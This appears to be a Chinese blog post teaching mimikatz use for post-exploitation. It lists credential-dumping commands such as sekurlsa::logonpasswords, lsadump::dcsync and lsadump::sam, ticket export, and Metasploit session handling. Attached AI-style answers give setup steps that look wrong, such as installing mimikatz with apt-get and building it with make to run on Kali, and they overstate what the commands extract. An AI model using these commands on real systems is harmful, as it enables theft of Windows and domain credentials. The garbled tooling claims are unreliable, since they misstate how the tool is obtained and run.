内网渗透工具mimikatz的使用

主要功能:

能够直接读取WindowsXP-2012等操作系统的明文密码

注意:

当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。

mimikatz命令

cls: 清屏 standard: 标准模块,基本命令 crypto: 加密相关模块 sekurlsa: 与证书相关的模块 kerberos: kerberos模块 privilege: 提权相关模块 process: 进程相关模块 serivce: 服务相关模块 lsadump: LsaDump模块 ts: 终端服务器模块 event: 事件模块 misc: 杂项模块 token: 令牌操作模块 vault: Windows 、证书模块 minesweeper:Mine Sweeper模块 net: dpapi: DPAPI模块(通过API或RAW访问)[数据保护应用程序编程接口] busylight: BusyLight Module sysenv: 系统环境值模块 sid: 安全标识符模块 iis: IIS XML配置模块 rpc: mimikatz的RPC控制 sr98: 用于SR98设备和T5577目标的RF模块 rdm: RDM(830AL)器件的射频模块 acr: ACR模块 version: 查看版本 exit: 退出

示例

抓取明文密码

在windows2012以上的系统不能直接获取明文密码了,当可以搭配procdump+mimikatz获取密码

mimikatz # log mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords

分析命令执行后的内容:

模块

**msv:**这项是账户对应密码的各种加密协议的密文,可以看到有LM、NTLM和SHA1加密的密文

**tspkg,wdigest,kerberos:**这个就是账户对应的明文密码了。有的时候这三个对应的也不是全部都是一样的,需要看服务器是什么角色。

**SSP:**是最新登录到其他RDP终端的账户和密码

sekurlsa模块

sekurlsa::logonpasswords 抓取用户NTLM哈希 sekurlsa::msv 加载dmp文件,并导出其中的明文密码 sekurlsa::minidump lsass.dmp sekurlsa::logonpasswords full 导出lsass.exe进程中所有的票据 sekurlsa::tickets /export

kerberos模块

列出系统中的票据 kerberos::list kerberos::tgt 清除系统中的票据 kerberos::purge 导入票据到系统中 kerberos::ptc 票据路径

lsadump模块

在域控上执行)查看域kevin.com内指定用户root的详细信息,包括NTLM哈希等 lsadump::dcsync /domain:kevin.com /user:root (在域控上执行)读取所有域用户的哈希 lsadump::lsa /patch 从sam.hive和system.hive文件中获得NTLM Hash lsadump::sam /sam:sam.hive /system:system.hive 从本地SAM文件中读取密码哈希 token::elevate lsadump::sam

wdigest

WDigest协议是在WindowsXP中被引入的,旨在与HTTP协议一起用于身份认证。默认情况下,Microsoft在多个版本的Windows(Windows XP-Windows 8.0和Windows Server 2003-Windows Server 2012)中启用了此协议,这意味着纯文本密码存储在LSASS(本地安全授权子系统服务)进程中。 Mimikatz可以与LSASS交互,允许攻击者通过以下命令检索这些凭据

mimikatz #privilege::debug mimikatz #sekurlsa::wdigest

ViperMSFconsole模块使用

输入sessions查看有哪些会话

sessions+会话id,连接该会话

输入shell,进入命令行终端

exit,断开会话,主机上的木马需重新启动

ctrl+z挂起

mimikatz # sekurlsa::logonpasswords privilege::debug 提升权限

nishang抓取NTML HASH

  • 39
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
### 回答1: 这是一个对于使用 Mimikatz 工具的教程。 Mimikatz 是一个开发者用来获取 Windows 认证凭证的工具,它可以解密 Windows 存储的密码,甚至可以获取经过 NTLM 身份验证的密码。 但请注意,使用这个工具可能会涉及到违法行为,请使用时慎重考虑。 ### 回答2: Mimikatz是一款用于提取Windows凭证的工具,它可以用来获取本地Windows用户和域用户的密码、NTLM哈希值和明文密码。本文将介绍如何通过Kali中的Mimikatz工具来实现提取凭证的操作。 1. 安装Mimikatz Mimikatz是Kali自带的工具,在终端中输入以下命令即可安装: ``` apt-get install mimikatz ``` 2. 运行Mimikatz 进入终端,输入以下命令来运行Mimikatz: ``` mimikatz ``` 如果你使用的是64位版本的系统,你还需要输入以下命令: ``` mimikatz # privilege::debug ``` 这个命令会给你的用户添加更多的访问权限,也就是所谓的debug权限。 3. 提取凭证 接下来,你可以通过以下命令来提取凭证: ``` mimikatz # sekurlsa::logonpasswords ``` 这个命令会输出本地计算机上所有用户的明文密码和NTLM哈希值。 如果你想获取域用户的凭证,可以使用以下命令: ``` mimikatz # sekurlsa::logonpasswords full ``` 这个命令会输出域控制器上所有域用户的明文密码和NTLM哈希值。 4. 清除日志和关闭Mimikatz 运行Mimikatz时默认会生成一些日志文件。如果你不希望这些日志留在计算机上,可以使用以下命令来清除日志: ``` mimikatz # log::clear ``` 最后,输入以下命令来关闭Mimikatz: ``` mimikatz # exit ``` 以上就是通过Kali中的Mimikatz工具来实现提取凭证的操作的详细教程。需要注意的是,Mimikatz是一款非常强大的工具使用时请谨慎,避免造成不必要的损失。 ### 回答3: Kali是一个开源免费的渗透测试操作系统,而mimikatz是一个密码破解工具,常被黑客用于窃取用户密码,因此Kali与mimikatz结合使用可以进行密码破解和渗透测试。 首先,在Kali中下载安装mimikatz。打开终端,输入以下命令: git clone https://github.com/gentilkiwi/mimikatz.git 然后,进入mimikatz文件夹,编译mimikatz工具: cd mimikatz make 编译完成后,输入以下命令即可使用mimikatz: ./mimikatz 接下来,使用privilege模块提升权限: privilege::debug 然后,使用sekurlsa模块获取系统的登录凭据: sekurlsa::logonpasswords 最后,我们可以通过导出文件的方式保存密码信息,输入以下命令: sekurlsa::logonpasswords full log sekurlsa.log 这样就完成了在Kali中使用mimikatz的教程。需要注意的是,这种密码破解和窃取方法是非法的,只能在授权的渗透测试环境中使用。在实际的工作中,我们要始终遵循合法合规的原则,做好安全防护和风险评估工作,确保系统和数据的安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值